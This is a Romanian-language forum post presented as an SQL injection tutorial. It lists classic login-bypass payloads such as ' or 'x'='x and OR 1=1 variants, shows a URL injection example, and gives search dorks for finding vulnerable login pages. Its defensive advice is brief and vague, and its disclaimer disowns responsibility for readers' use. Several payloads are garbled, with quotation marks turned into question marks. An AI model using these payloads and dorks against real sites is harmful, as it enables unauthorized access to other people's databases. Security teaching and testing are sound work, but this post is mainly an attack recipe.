Jump to content
CODEX

[Tutorial] SQL Injection

Recommended Posts

Posted

Disclaimer

* Acest tutorial este destinat invatarii , a cunoasterii aprofundate a securitatii webserverelor

* NU raspund de ceea ce faceti dupa ce ati dobandit aceste cunostinte

:::: SQL Injection ::::

SQL Injection este metoda care exploateaza erorile din codul aplicatiilor si permite atacatorului sa injecteze comenzi SQL in formele de login feedback forms,cu scopul obtinerii accesului la informatiile din baza de date.

SQL Injection functioneaza deoarece formele de imput permit expresii SQL sa patrunda direct in baza de date.

Construind programme cu SQL pentru a manipula comenzile din baza si in acest fel capatand acces.

Cea mai folosita este SQL login bypass ,injectand in sectia de login si password.

Exemplu : ? OR 1=1?

Schema URL: http://site.com/index.php?id=0 ? OR 1=1?

Alte comenzi :

admin??

? OR 0=0?

? OR=0?

OR 0=0?

? HI OR 1=1?

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

Cautam astfel de siteuri cu urmatoarele dorkuri :

?admin\login.asp?
?login.asp?

Cum sa te aperi de astfel de atacuri.

Sistemul trebuie evaluat pentru orice fel de vulnerabilitate ,codurile trebuie sa fie bug free ,si

aplicatiile si tot ce face parte din infrastructura bine satinizate.

La fiecare schimbare a componentelor trebuie facut un web security audit.

Nu are rost sa intru in detalii si in plus nu cunosc indeajuns de mult baza SQL,insa daca nu aveti o infrastructura complexa de care sa aveti grija nici nu se merita sa va complicati.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...